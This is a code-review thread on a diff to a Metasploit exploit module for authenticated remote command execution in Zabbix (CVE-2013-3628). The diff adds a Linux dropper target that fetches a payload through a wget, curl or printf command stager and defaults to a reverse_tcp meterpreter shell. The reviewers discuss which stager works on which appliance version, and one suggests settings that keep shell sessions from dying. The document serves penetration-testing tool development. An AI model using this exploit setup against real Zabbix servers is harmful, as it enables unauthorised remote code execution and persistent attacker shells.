modules/exploits/multi/http/zabbix_script_exec.rb

```diff
@@ -7,196 +7,388 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Zabbix Authenticated Remote Command Execution',
-      'Description'    => %q{
-      ZABBIX allows an administrator to create scripts that will be run on hosts.
-      An authenticated attacker can create a script containing a payload, then a host
-      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.
-
-      This module was tested against Zabbix v2.0.9.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zabbix Authenticated Remote Command Execution',
+        'Description' => %q{
+          ZABBIX allows an administrator to create scripts that will be run on hosts.
+          An authenticated attacker can create a script containing a payload, then a host
+          with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.
+
+          This module was tested against Zabbix v2.0.9, v2.0.5, v3.0.1, v4.0.18, v5.0.17, v6.0.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Discovery / msf module
+          'lap1nou <lapinousexy[at]gmail.com>' # Update of the module / Item technique
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2013-3628'],
           ['URL', 'https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats']
         ],
-      'Payload'        =>
-      {
-        'Compat'     =>
-        {
-          'PayloadType'  => 'cmd',
-          'RequiredCmd'  => 'generic perl ruby telnet python',
+
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Linux Dropper', {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
```

Comment:
Looks like the module selects `wget` as the command stager flavor since none is specified as the default. I'd suggest setting the default to `curl` though since it's available on the Zabbix appliance while `wget` is not. That would make it work with one less configuration change, at least when targeting the appliance version.

Reply:
I agree, but it actually depend on which appliance version you are talking about, for example the 4.0 got wget but not curl, same for 3.0.

Reply:
I agree, but it actually depend on which appliance version you are talking about, for example the 4.0 got wget but not curl, same for 3.0, but 6.0 got curl, so I will change it since there is more chance to have a recent version nowadays.

Thanks for all your review, I learned quite a few things about MSF module.

Reply:
Sorry I should have been more clear on this. To set the default stager flavor, set the default CMDSTAGER::FLAVOR option here.

```suggestion
                'CMDSTAGER::FLAVOR' => 'curl',
                'MeterpreterTryToFork' => true,
                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
```

I also enabled `MeterpreterTryToFork` which fixed an issue where my sessions were dying after a while.